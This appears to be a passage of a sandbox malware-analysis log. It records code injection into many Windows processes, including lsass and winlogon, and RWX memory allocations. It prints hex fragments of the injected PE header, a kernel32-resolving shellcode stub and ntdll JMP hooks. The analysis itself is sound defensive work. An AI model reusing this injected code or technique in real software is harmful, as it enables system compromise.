00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1828 C:\WINDOWS\system32\ctfmon.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1828 C:\WINDOWS\system32\ctfmon.exe A30000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1828 C:\WINDOWS\system32\ctfmon.exe 7C90CFEE 5 E9 BF 33 12 84 success or wait 1 BAE2A6F
448 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
448 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
448 C:\WINDOWS\system32\svchost.exe A60000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
448 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 15 84 success or wait 1 BAE2A6F
508 C:\Program Files\Java\jre6\bin\jqs.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
508 C:\Program Files\Java\jre6\bin\jqs.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
508 C:\Program Files\Java\jre6\bin\jqs.exe 10A0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90CFEE 5 E9 BF 33 79 84 success or wait 1 BAE2A6F
1988 C:\WINDOWS\system32\alg.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1988 C:\WINDOWS\system32\alg.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1988 C:\WINDOWS\system32\alg.exe 990000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1988 C:\WINDOWS\system32\alg.exe 7C90CFEE 5 E9 BF 33 08 84 success or wait 1 BAE2A6F
236 C:\WINDOWS\system32\wscntfy.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
236 C:\WINDOWS\system32\wscntfy.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
236 C:\WINDOWS\system32\wscntfy.exe AE0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
236 C:\WINDOWS\system32\wscntfy.exe 7C90CFEE 5 E9 BF 33 1D 84 success or wait 1 BAE2A6F
724 C:\WINDOWS\system32\msiexec.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
724 C:\WINDOWS\system32\msiexec.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
724 C:\WINDOWS\system32\msiexec.exe 990000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
724 C:\WINDOWS\system32\msiexec.exe 7C90CFEE 5 E9 BF 33 08 84 success or wait 1 BAE2A6F
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe C00000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90CFEE 5 E9 BF 33 2F 84 success or wait 1 BAE2A6F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 650000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90CFEE 5 E9 BF 33 D4 83 success or wait 1 BAE2A6F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 8F0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90CFEE 5 E9 BF 33 FE 83 success or wait 1 BAE2A6F
2264 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
2264 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
2264 C:\WINDOWS\system32\svchost.exe 9A0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
2264 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 09 84 success or wait 1 BAE2A6F
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
636 C:\WINDOWS\system32\winlogon.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
636 C:\WINDOWS\system32\winlogon.exe A30000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
692 C:\WINDOWS\system32\lsass.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
692 C:\WINDOWS\system32\lsass.exe 9B0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
892 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
892 C:\WINDOWS\system32\svchost.exe EB0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
968 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
968 C:\WINDOWS\system32\svchost.exe AF0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1052 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1052 C:\WINDOWS\system32\svchost.exe 1A80000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1100 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1100 C:\WINDOWS\system32\svchost.exe 890000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1144 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1144 C:\WINDOWS\system32\svchost.exe 990000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1496 C:\WINDOWS\system32\spoolsv.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1496 C:\WINDOWS\system32\spoolsv.exe A40000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1636 C:\WINDOWS\explorer.exe BAD0000 216FBA8 page execute and read and write conflicting addresses 1 BAE5848
1636 C:\WINDOWS\explorer.exe BB16000 216FBA8 page execute and read and write conflicting addresses 1 BAE5848
1636 C:\WINDOWS\explorer.exe BB50000 216FBA8 page execute and read and write success or wait 1 BAE5848
1828 C:\WINDOWS\system32\ctfmon.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1828 C:\WINDOWS\system32\ctfmon.exe A30000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
448 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
448 C:\WINDOWS\system32\svchost.exe A60000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
508 C:\Program Files\Java\jre6\bin\jqs.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
508 C:\Program Files\Java\jre6\bin\jqs.exe 10A0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1988 C:\WINDOWS\system32\alg.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1988 C:\WINDOWS\system32\alg.exe 990000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
236 C:\WINDOWS\system32\wscntfy.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
236 C:\WINDOWS\system32\wscntfy.exe AE0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
724 C:\WINDOWS\system32\msiexec.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
724 C:\WINDOWS\system32\msiexec.exe 990000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe C00000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
